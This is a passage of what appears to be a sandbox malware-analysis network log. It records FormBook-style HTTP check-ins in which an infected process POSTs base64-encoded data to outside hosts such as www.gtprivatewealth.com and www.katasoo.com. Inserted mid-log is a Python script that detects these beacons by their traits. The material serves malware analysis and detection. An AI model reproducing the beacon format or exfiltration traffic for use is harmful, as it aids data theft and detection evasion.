                                                            Referer: http://www.gtprivatewealth.com/4d31/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 31 36 78 70 53 34 4b 51 79 53 52 39 69 6f 53 62 70 69 30 35 4b 77 66 72 36 42 63 6a 67 49 50 34 2b 63 4b 69 33 78 50 43 62 4f 75 4d 6a 48 66 44 6e 49 50 42 6f 54 62 78 69 65 79 4a 44 30 50 47 59 52 6c 2b 5a 41 4b 77 32 6a 68 47 56 64 5a 52 46 51 2b 7a 58 6f 57 6e 39 56 68 2f 31 6e 65 4d 68 4c 46 42 6d 2b 67 57 35 59 68 64 78 30 71 76 2b 2b 6a 7a 34 36 75 36 2f 56 4b 79 4a 4d 2b 44 61 58 32 71 4c 4c 62 2f 4d 72 39 78 6d 31 70 42 4c 39 63 49 38 62 66 4e 6b 57 59 63 55 79 76 6a 6d 39 4a 49 45 73 64 74 4a 35 6c 7a 59 31 50 45 2b 63 75 58 6d 51 45 32 52 32 43 72 64 6a 51 37 62 41 3d 3d
                                                            Data Ascii: 4NZpb=16xpS4KQySR9ioSbpi05Kwfr6BcjgIP4+cKi3xPCbOuMjHfDnIPBoTbxieyJD0PGYRl+ZAKw2jhGVdZRFQ+zXoWn9Vh/1neMhLFBm+gW5Yhdx0qv++jz46u6/VKyJM+DaX2qLLb/Mr9xm1pBL9cI8bfNkWYcUyvjm9JIEsdtJ5lzY1PE+cuXmQE2R2CrdjQ7bA==


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            13 | 192.168.2.4 | 49755 | 3.33.130.190 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Aug 28, 2024 14:03:58.581315041 CEST | 814 | OUT | POST /4d31/ HTTP/1.1
                                                            Host: www.gtprivatewealth.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 222
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.gtprivatewealth.com
                                                            Referer: http://www.gtprivatewealth.com/4d31/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 31 36 78 70 53 34 4b 51 79 53 52 39 6a 4c 61 62 75 42 73 35 49 51 66 6f 6e 78 63 6a 70 6f 50 6b 2b 63 47 69 33 78 6d 64 62 64 61 4d 6a 6d 76 44 31 38 62 42 70 54 62 78 70 2b 79 51 63 45 50 4e 59 52 70 32 5a 46 71 77 32 6a 6c 47 56 63 46 52 46 43 57 77 57 34 57 68 31 31 68 35 36 48 65 4d 68 4c 46 42 6d 36 41 77 35 59 70 64 78 45 36 76 2b 62 58 38 37 36 75 35 76 31 4b 79 4e 4d 2f 72 61 58 32 55 4c 50 44 46 4d 74 35 78 6d 31 5a 42 4c 50 6b 48 32 62 66 50 36 57 5a 43 55 69 75 57 6f 59 30 35 4f 76 68 54 42 37 78 43 64 7a 65 65 76 74 50 41 30 51 67 46 4d 78 4c 66 51 67 74 79 41 42 57 79 53 64 69 7a 53 5a 4a 61 33 6b 49 51 65 33 6c 4a 34 69 67 3d
                                                            Data Ascii: 4NZpb=16xpS4KQySR9jLabuBs5IQfonxcjpoPk+cGi3xmdbdaMjmvD18bBpTbxp+yQcEPNYRp2ZFqw2jlGVcFRFCWwW4Wh11h56HeMhLFBm6Aw5YpdxE6v+bX876u5v1KyNM/raX2ULPDFMt5xm1ZBLPkH2bfP6WZCUiuWoY05OvhTB7xCdzeevtPA0QgFMxLfQgtyABWySdizSZJa3kIQe3lJ4ig=


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            14 | 192.168.2.4 | 49756 | 3.33.130.190 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Aug 28, 2024 14:04:01.131511927 CEST | 10896 | OUT | POST /4d31/ HTTP/1.1
                                                            Host: www.gtprivatewealth.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 10302
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.gtprivatewealth.com
                                                            Referer: http://www.gtprivatewealth.com/4d31/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 31 36 78 70 53 34 4b 51 79 53 52 39 6a 4c 61 62 75 42 73 35 49 51 66 6f 6e 78 63 6a 70 6f 50 6b 2b 63 47 69 33 78 6d 64 62 63 69 4d 69 55 6e 44 6b 75 7a 42 34 6a 62 78 31 75 79 4e 63 45 50 51 59 52 78 79 5a 46 76 4c 32 68 74 47 55 2b 68 52 53 47 43 77 59 34 57 68 71 6c 68 34 31 6e 66 4f 68 4c 31 64 6d 2b 73 77 35 59 70 64 78 47 79 76 35 4f 6a 38 33 61 75 36 2f 56 4c 67 4a 4d 2b 47 61 54 53 45 4c 50 50 56 4d 64 5a 78 6d 52 39 42 59 4b 49 48 36 62 66 4a 2f 57 5a 4b 55 69 69 2f 6f 59 42 47 4f 75 56 35 42 35 74 43 52 47 6a 54 31 2b 66 36 75 42 77 2b 4f 43 58 56 65 33 35 7a 4a 77 4c 4f 44 50 57 55 41 4b 39 76 71 32 5a 47 4e 46 70 51 6d 31 75 2b 47 35 64 30 6a 4d 54 41 70 61 51 44 41 52 78 31 72 33 59 41 6d 43 2b 6f 31 74 53 58 6a 68 34 74 71 4f 6b 78 79 33 69 59 59 52 76 46 63 36 6f 62 34 73 7a 41 59 79 37 44 49 45 6c 65 46 56 37 43 4e 4e 39 5a 62 72 37 51 64 6b 73 4b 45 2b 75 6f 70 78 65 43 66 4b 4e 70 51 4c 79 53 43 39 78 52 7a 4c 52 4c 50 48 71 52 46 6d 5a 4f 71 6b 7a 43 32 71 58 6b [TRUNCATED]
                                                            Data Ascii: 4NZpb=16xpS4KQySR9jLabuBs5IQfonxcjpoPk+cGi3xmdbciMiUnDkuzB4jbx1uyNcEPQYRxyZFvL2htGU+hRSGCwY4Whqlh41nfOhL1dm+sw5YpdxGyv5Oj83au6/VLgJM+GaTSELPPVMdZxmR9BYKIH6bfJ/WZKUii/oYBGOuV5B5tCRGjT1+f6uBw+OCXVe35zJwLODPWUAK9vq2ZGNFpQm1u+G5d0jMTApaQDARx1r3YAmC+o1tSXjh4tqOkxy3iYYRvFc6ob4szAYy7DIEleFV7CNN9Zbr7QdksKE+uopxeCfKNpQLySC9xRzLRLPHqRFmZOqkzC2qXk [TRUNCATED]


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            15 | 192.168.2.4 | 49757 | 3.33.130.190 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Aug 28, 2024 14:04:03.721163034 CEST | 519 | OUT | GET /4d31/?4NZpb=44ZJRM6AgTVPkKil+kd2ECDljiAinZzthaG9nSTHLei+l0aw1OTq0hHH0sOZCGiiVCJZfD2Z+hB7dvZEWwWKI/qJszR12iWSsaxd9ZNP8Jsr6UPfm6Ca5qI=&8le=9XPp_0_hUrF45X HTTP/1.1
                                                            Host: www.gtprivatewealth.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Aug 28, 2024 14:04:05.108885050 CEST | 400 | IN | HTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Wed, 28 Aug 2024 12:04:05 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 260
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 34 4e 5a 70 62 3d 34 34 5a 4a 52 4d 36 41 67 54 56 50 6b 4b 69 6c 2b 6b 64 32 45 43 44 6c 6a 69 41 69 6e 5a 7a 74 68 61 47 39 6e 53 54 48 4c 65 69 2b 6c 30 61 77 31 4f 54 71 30 68 48 48 30 73 4f 5a 43 47 69 69 56 43 4a 5a 66 44 32 5a 2b 68 42 37 64 76 5a 45 57 77 57 4b 49 2f 71 4a 73 7a 52 31 32 69 57 53 73 61 78 64 39 5a 4e 50 38 4a 73 72 36 55 50 66 6d 36 43 61 35 71 49 3d 26 38 6c 65 3d 39 58 50 70 5f 30 5f 68 55 72 46 34 35 58 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?4NZpb=44ZJRM6AgTVPkKil+kd2ECDljiAinZzthaG9nSTHLei+l0aw1OTq0hHH0sOZCGiiVCJZfD2Z+hB7dvZEWwWKI/qJszR12iWSsaxd9ZNP8Jsr6UPfm6Ca5qI=&8le=9XPp_0_hUrF45X"}</script></head></html>

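The requests in sessions 11 to 17 share one profile: a single hard-coded Chrome/43 User-Agent, a four-character directory as the path, Connection: close on every request, Origin and Referer on the POSTs pointing back at the same path, and one form parameter (4NZpb) carrying a base64 blob that is reused, together with the 8le parameter, against three unrelated hosts. The Python below is an added example, not part of the Joe Sandbox report: it re-parses request dumps of this shape and scores those traits. The request lines, hosts and bodies in its sample set are copied from sessions 11, 12, 15 and 16 above with the headers trimmed to those the scorer reads; the request against www.example.com is constructed for contrast; the trait names, the four-trait threshold and the 64-character blob minimum are the example's own choices, not anything the report states.

```python
"""Heuristic triage of FormBook-style HTTP check-ins: an added example, not part
of the Joe Sandbox report; thresholds and trait names are its own choices."""
import binascii
import re
from base64 import b64decode
from collections import defaultdict

# User-Agent carried by every request from PID 792 in the dump above.
FORMBOOK_UA = ("Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36")
SHORT_PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def split_form(data):
    """Split k=v&k2=v2 by hand: urllib's parse_qsl rewrites '+' to ' ', which
    would silently corrupt the raw '+' and '/' inside the blobs above."""
    out = {}
    for pair in filter(None, data.split("&")):
        key, _, value = pair.partition("=")
        out[key] = value
    return out


def parse_request(raw):
    """Parse one raw HTTP/1.1 request (CRLF line endings) into a dict."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    params = split_form(query)
    if method == "POST" and headers.get("content-type", "").startswith(
            "application/x-www-form-urlencoded"):
        params.update(split_form(body))
    return {"method": method, "path": path, "host": headers.get("host", ""),
            "headers": headers, "params": params}


def looks_base64(value, min_len=64):
    """True for well-formed base64 of at least min_len characters."""
    if len(value) < min_len or len(value) % 4 or not B64_RE.match(value):
        return False
    try:
        b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def score(req):
    """Return the check-in traits this request matches."""
    hits, hdr, params = [], req["headers"], req["params"]
    if hdr.get("user-agent") == FORMBOOK_UA:
        hits.append("hardcoded-ua")
    if SHORT_PATH_RE.match(req["path"]):
        hits.append("four-char-path")
    if hdr.get("connection", "").lower() == "close":
        hits.append("connection-close")
    if any(looks_base64(v) for v in params.values()):
        hits.append("base64-param")
    origin = "http://" + req["host"]  # the POSTs above name the C2 path as their own referer
    if req["method"] == "POST" and hdr.get("origin") == origin \
            and hdr.get("referer") == origin + req["path"]:
        hits.append("self-referer")
    return hits


def correlate(reqs, min_hosts=2):
    """Parameter names reused against min_hosts or more hosts: the decoy
    domains rotate, the per-build names (4NZpb and 8le above) do not."""
    hosts_by_param = defaultdict(set)
    for req in reqs:
        for name in req["params"]:
            hosts_by_param[name].add(req["host"])
    return {k: sorted(v) for k, v in hosts_by_param.items() if len(v) >= min_hosts}


def triage(raw_requests, min_hits=4):
    """Return (flagged host+path list, shared-parameter map) for a batch."""
    parsed = [parse_request(r) for r in raw_requests]
    flagged = [r["host"] + r["path"] for r in parsed if len(score(r)) >= min_hits]
    return flagged, correlate(parsed)


def _req(*lines, body=""):
    return "\r\n".join(lines) + "\r\n\r\n" + body


_UA = "User-Agent: " + FORMBOOK_UA
_FORM = "Content-Type: application/x-www-form-urlencoded"
# Request lines, hosts and bodies copied from sessions 11, 12, 15 and 16 above
# (headers trimmed to those the scorer reads), plus one constructed benign request.
SAMPLE_REQUESTS = [
    _req("GET /hxac/?8le=9XPp_0_hUrF45X&4NZpb=wllhn08WkHjd+gPBZYdKI+Wub1CXtIyBM4enHvEIvHUTkTToN320udwR7cLzIMMwTNDWywCtYc+R0ImolTn3KMGu+XweR0RV6KIox9Z26IjagLFeiEZ18o4= HTTP/1.1", "Host: www.411divorce.com", "Connection: close", _UA),
    _req("POST /4d31/ HTTP/1.1", "Host: www.gtprivatewealth.com", _FORM, "Connection: close",
         "Origin: http://www.gtprivatewealth.com", "Referer: http://www.gtprivatewealth.com/4d31/", _UA,
         body="4NZpb=16xpS4KQySR9ioSbpi05Kwfr6BcjgIP4+cKi3xPCbOuMjHfDnIPBoTbxieyJD0PGYRl+ZAKw2jhGVdZRFQ+zXoWn9Vh/1neMhLFBm+gW5Yhdx0qv++jz46u6/VKyJM+DaX2qLLb/Mr9xm1pBL9cI8bfNkWYcUyvjm9JIEsdtJ5lzY1PE+cuXmQE2R2CrdjQ7bA=="),
    _req("GET /4d31/?4NZpb=44ZJRM6AgTVPkKil+kd2ECDljiAinZzthaG9nSTHLei+l0aw1OTq0hHH0sOZCGiiVCJZfD2Z+hB7dvZEWwWKI/qJszR12iWSsaxd9ZNP8Jsr6UPfm6Ca5qI=&8le=9XPp_0_hUrF45X HTTP/1.1", "Host: www.gtprivatewealth.com", "Connection: close", _UA),
    _req("POST /7qad/ HTTP/1.1", "Host: www.katasoo.com", _FORM, "Connection: close",
         "Origin: http://www.katasoo.com", "Referer: http://www.katasoo.com/7qad/", _UA,
         body="4NZpb=QamxpcChhbknbFgjnRVAG1nz8d1XNAX1mOSIlZSL53hOQB9AdNX0Lj3TVEZ8hGjgBg+oE8FT2xiSuXu2Ex8+ui6MMUuvaMI9Vqj05tp6LMasbCPiDExNhWaNr+wbHKNSYk3yPHERCShG6uzMWjrjwUTHbi35CmJOTr/R6HqvBn6FufkWknX9giWZYilMuBZN8w=="),
    _req("GET /index.html?lang=en HTTP/1.1", "Host: www.example.com", "Connection: keep-alive",
         "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/128.0"),  # constructed, benign
]
```

Two points from writing this against the dump: the form splitter is hand-rolled because urllib's parse_qsl turns the unescaped `+` in these blobs into spaces, so a naive decoder would reject every value as malformed base64; and of the individual traits, the User-Agent string and the four-character path are the weakest on their own (both occur in legitimate traffic), while the same parameter name turning up on several unrelated hosts from one process is the signal worth alerting on. Against the sessions above, triage() flags all four copied requests and reports 4NZpb across three hosts and 8le across two.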

                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            16 | 192.168.2.4 | 49758 | 188.114.96.3 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Aug 28, 2024 14:04:10.191402912 CEST | 770 | OUT | POST /7qad/ HTTP/1.1
                                                            Host: www.katasoo.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 202
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.katasoo.com
                                                            Referer: http://www.katasoo.com/7qad/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 51 61 6d 78 70 63 43 68 68 62 6b 6e 62 46 67 6a 6e 52 56 41 47 31 6e 7a 38 64 31 58 4e 41 58 31 6d 4f 53 49 6c 5a 53 4c 35 33 68 4f 51 42 39 41 64 4e 58 30 4c 6a 33 54 56 45 5a 38 68 47 6a 67 42 67 2b 6f 45 38 46 54 32 78 69 53 75 58 75 32 45 78 38 2b 75 69 36 4d 4d 55 75 76 61 4d 49 39 56 71 6a 30 35 74 70 36 4c 4d 61 73 62 43 50 69 44 45 78 4e 68 57 61 4e 72 2b 77 62 48 4b 4e 53 59 6b 33 79 50 48 45 52 43 53 68 47 36 75 7a 4d 57 6a 72 6a 77 55 54 48 62 69 33 35 43 6d 4a 4f 54 72 2f 52 36 48 71 76 42 6e 36 46 75 66 6b 57 6b 6e 58 39 67 69 57 5a 59 69 6c 4d 75 42 5a 4e 38 77 3d 3d
                                                            Data Ascii: 4NZpb=QamxpcChhbknbFgjnRVAG1nz8d1XNAX1mOSIlZSL53hOQB9AdNX0Lj3TVEZ8hGjgBg+oE8FT2xiSuXu2Ex8+ui6MMUuvaMI9Vqj05tp6LMasbCPiDExNhWaNr+wbHKNSYk3yPHERCShG6uzMWjrjwUTHbi35CmJOTr/R6HqvBn6FufkWknX9giWZYilMuBZN8w==
                                                            Aug 28, 2024 14:04:10.871634007 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                            Date: Wed, 28 Aug 2024 12:04:10 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                            set-cookie: wp_woocommerce_session_cfa12a8f8cbb64cd768d0f772536504c=t_5063416e1289b199f2413e8737e4ca%7C%7C1725019450%7C%7C1725015850%7C%7Cceb62e721885b64e1797ee288a644a39; expires=Fri, 30-Aug-2024 12:04:10 GMT; Max-Age=172800; path=/; HttpOnly
                                                            link: <https://katasoo.com/wp-json/>; rel="https://api.w.org/"
                                                            vary: Accept-Encoding
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e7Jb45O%2F58zDZA7wBpQvRHF%2FnNwZ%2BtBualZ1TqGrDukHaoO%2FFAOZU5vBUn%2FNvODMGvQRKOP7N10CqreOWygb2jVDdpqVneUfd2J3z3LR%2B5T78GrEGva1tFzZq9wOBaJbhzY%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ba4298e590842f1-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            Data Raw: 33 36 63 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d eb 76 db 38 d2 e0 6f fb 9c 7d 07 84 e9 58 52 c2 bb 6e b6 64 39 9b 49 a7 a7 7b 27 99 f4 b4 d3 5f 7f bd 89 57 07 22 21 89 36 45 32 04 69 d9 ed d6 03 ed 6b ec 93 ed 29 00 24 41 8a ba f8 92 99 d9 b3 5f cf c4 92 80 42 a1 50 00 0a 85 42 a1 70 fa ec fb 8f 6f 3f fd fe f3 3b 34 4f 16 fe d9 e1 e9 33 4d fb ec 4d d1 4f ef d0 09 ba 38 43 a7 90 8c 7c 1c cc 46 0a 09 b4 5f cf 15 e4 f8 98 d2 91 e2 91 13 e4 87 d8 f5 82 99 46 bd 84 a0 20 d4 2e a9 72 86 4e 9f 7d 26 81 eb 4d 2f 34 ad 84 ef 78 17 be e3 7b e0 6b ce 12 c2 88 6c fd f9 ac f9 d3 bb d6 c5 19 e4 9c 6d
                                                            Data Ascii: 36c9}v8o}XRnd9I{'_W"!6E2ik)$A_BPBpo?;4O3MMO8C|F_F .rN}&M/4x{klm
                                                            Aug 28, 2024 14:04:10.871649981 CEST | 1236 | IN | Data Raw: 46 bf 01 b5 a6 95 d1 cf 09 76 cf 0e 0f 4e 17 24 c1 c8 99 e3 98 92 64 a4 fc fa e9 07 ed 58 41 06 e4 f8 5e 70 85 62 e2 8f 94 28 0e a7 9e 4f 14 34 8f c9 74 a4 cc 93 24 1a 18 c6 6c 11 cd f4 30 9e 19 37 d3 c0 b0 ac f5 52 5e 30 9b 60 e7 aa 52 ec 0a 27
                                                            Data Ascii: FvN$dXA^pb(O4t$l07R^0`R'fG><8NEYsNA:k*'1|eebKhZM7t='K|r34EGmqyu^Q#'aB73E1rxF
                                                            Aug 28, 2024 14:04:10.871654987 CEST | 1236 | IN | Data Raw: 3a fa cc 67 a4 2a 46 c5 85 1a e8 42 14 d3 d1 1d 9b f3 c9 dc 0b 66 83 67 a6 5a fc 7a 77 e3 90 28 f9 c1 c7 90 be 52 09 93 7e a2 c6 12 0b 3c 1d bb ee bb 6b 12 24 ef 3d 9a c0 0a d1 54 be ff f8 e1 2d 57 a1 de 87 d8 25 ae a2 12 f5 2e 0c 1c c2 ba 61 c5
                                                            Data Ascii: :g*FBfgZzw(R~<k$=T-W%.a+)AFLG7++,[Z7m*82D ]LH,stTJzf4Q*-NLL}d>Zw@YttTW(@_Vn%iPgIxfT^}
                                                            Aug 28, 2024 14:04:10.871737003 CEST | 1236 | IN | Data Raw: ad 5a c7 5d d5 2c d8 00 89 5d d5 32 45 e2 bd 48 e1 55 16 dc 60 53 62 7b fd 52 55 82 0f b6 d9 57 3b 3d b5 d3 db 55 39 28 6a 79 57 e0 5b a8 76 5d 08 6c e9 04 bb 7d ac 8a 7f c5 18 e8 9d a8 d6 71 47 b5 4e ba bb aa 77 c2 d0 87 3a 97 38 5e 68 4c 9c c5
                                                            Data Ascii: Z],]2EHU`Sb{RUW;=U9(jyW[v]l}qGNw:8^hLbkj;T?i![tL:YZXteiP'-tuTswot.{j{6YTcW[qzj]uAP7nJhb[,h.jucf2ti
                                                            Aug 28, 2024 14:04:10.871751070 CEST | 1236 | IN | Data Raw: 34 66 14 ba df a8 29 30 c6 b2 2a 1e 42 bd e4 8a 1a 86 ec 12 5e ec 90 cc 23 6e ab 63 9c 2e 15 40 30 f4 91 ce 26 40 1c 2e 91 0e 17 34 bc 98 b8 e8 0e 5d 7b d4 9b 78 be 97 dc 0e f8 77 9f 0c d1 9e 5e 9a 61 a8 5d e3 d8 63 ee 7c 1a 5d 82 b7 36 a1 0f e3
                                                            Data Ascii: 4f)0*B^#nc.@0&@.4]{xw^a]c|]6:,VYfO>jj\o*>` X}~Kgxp0GMSsi.2~j5hr/m&@%5`x~6Gpl 5^m%iVGpk
                                                            Aug 28, 2024 14:04:10.871773005 CEST | 1236 | IN | Data Raw: b8 b8 3b dc c8 43 48 ff 43 f3 02 97 dc 00 35 9d 2e 34 2f df 55 67 52 e1 ec f2 1f a0 3d e6 d1 d8 5a fc 7a 7c 7e 9f 1e 35 bf 6b 09 0e 18 06 f2 f1 1f b7 2c 48 1e 4b 80 30 78 8d 46 96 0d ff 71 64 3a b9 01 79 d0 14 bf a0 10 c4 fe f8 cf 4f aa 04 0a ff
                                                            Data Ascii: ;CHC5.4/UgR=Zz|~5k,HK0xFqd:yOy$5PK1,,50pf3]0+ $L"R4IZs0Fa\$%VNF,DSSjUY&@`?\/4$n` noAb
                                                            Aug 28, 2024 14:04:10.871784925 CEST | 776 | IN | Data Raw: 4a 9b 1b 37 2d 87 b5 1b 75 a6 e9 1a 06 62 ce 3a 93 62 4f 7d b8 bf 19 25 e7 4f ee f0 43 85 04 6f 6c 1f 0c 4f b1 ed 9e 7b ae 4b 02 79 36 ed b5 23 ab b7 03 7c 23 5b 80 d8 dd 75 8b dd 5d b6 bd 60 da b9 25 a9 e7 99 fa be 07 63 99 2d 68 43 13 61 20 79
                                                            Data Ascii: J7-ub:bO}%OColO{Ky6#|#[u]`%c-hCa y4!UaeX`*h>.0b>^5qIVdkjnKFmqS->MkM^UtYA2R+TrUybZiwW/XtU#1c`&(Q~Rc[_C tHIbp
                                                            Aug 28, 2024 14:04:10.872050047 CEST | 1236 | IN | Data Raw: d5 6e f2 72 a4 6c 31 63 29 17 82 ba b5 7d fd 2e 0d 27 ab 62 56 51 ca 8a 01 9c 32 61 99 c3 6d b0 eb 34 2a 4b cb b3 34 f6 b7 db 8b b3 3d 78 ed 4c 66 02 9f d9 1e 7e e3 b3 5a 4e fa 31 9b e1 20 3c d7 28 4d 63 bf 78 3c 0b 08 7e 69 a8 8c a7 1a 6c b2 79
                                                            Data Ascii: nrl1c)}.'bVQ2am4*K4=xLf~ZN1 <(Mcx<~ilyPC_IcHo4&>aOg0;9[/?Pfj#r8|8\e~SDvRBH-D1#_a7qm3'U&#%f+gdv'V@:@"Yt
                                                            Aug 28, 2024 14:04:10.872061014 CEST | 1236 | IN | Data Raw: c9 7e b8 80 0c 3c e3 5a a6 60 79 84 c1 d1 88 ed 47 c5 88 d5 9d 34 06 99 a1 6e c8 a7 11 0e 06 cc 15 6c 13 04 ce b2 61 04 b1 af 3c 61 eb 08 e0 ef 18 7d e6 eb 1c 4d 27 0b 2f 51 a0 d3 78 ba be 74 40 06 2c 71 ec 0e 82 30 69 ea d9 5e a9 55 fe 29 9e 72
                                                            Data Ascii: ~<Z`yG4nla<a}M'/Qxt@,q0i^U)rj9*^$hldGh]1A9Wp|Gw)kJmg US&cN%aD^|"1q3>|GVT.>&=,fC;o}yy`w
                                                            Aug 28, 2024 14:04:10.872071981 CEST | 1236 | IN | Data Raw: 52 6c f0 18 0e 6c 2c 35 2e d0 5d 11 16 83 2d 84 68 b5 dd 58 9b bb 04 28 7f 27 4b 65 98 41 cf c3 64 3b f4 8f 61 52 40 c3 48 da 0e 7e 8e 7d 52 c0 47 61 04 81 f6 b6 17 f9 99 03 29 92 f3 88 01 a2 0c ce ca d9 9b 8b e2 b6 30 f3 24 ed 98 1d 7e b1 4d cb
                                                            Data Ascii: Rll,5.]-hX('KeAd;aR@H~}RGa)0$~M\ZjGEQsBco-wkC?"HKSmBy,t.S5^y!Gn)gW^0;K>50*c-)_k5~-r2]DY"0/0M
                                                            Aug 28, 2024 14:04:10.876611948 CEST | 1236 | IN | Data Raw: 06 42 76 f3 34 90 7b bf 40 90 c5 d8 81 bf 9a b0 d3 d4 ce 1a a9 08 37 57 f2 83 43 be 73 2d 8d b2 79 27 5f 3c 0b 99 0c 8d 3a 35 e6 9d 4d e3 d1 a3 9a 0b af 30 f2 30 bf f9 0c 29 4d 97 07 4d e3 7f ca 44 ae 6d 12 e3 58 76 3c 97 b9 34 14 fa 1f 2f 2e a1
                                                            Data Ascii: Bv4{@7WCs-y'_<:5M00)MMDmXv<4/.f}eLG)$Yvum46w-kUH~]t`R7MY4MWd(^RE-pf"S~foszMI0v)[n?x'


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            17 | 192.168.2.4 | 49759 | 188.114.96.3 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Aug 28, 2024 14:04:12.721880913 CEST | 790 | OUT | POST /7qad/ HTTP/1.1
                                                            Host: www.katasoo.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 222
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.katasoo.com
                                                            Referer: http://www.katasoo.com/7qad/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
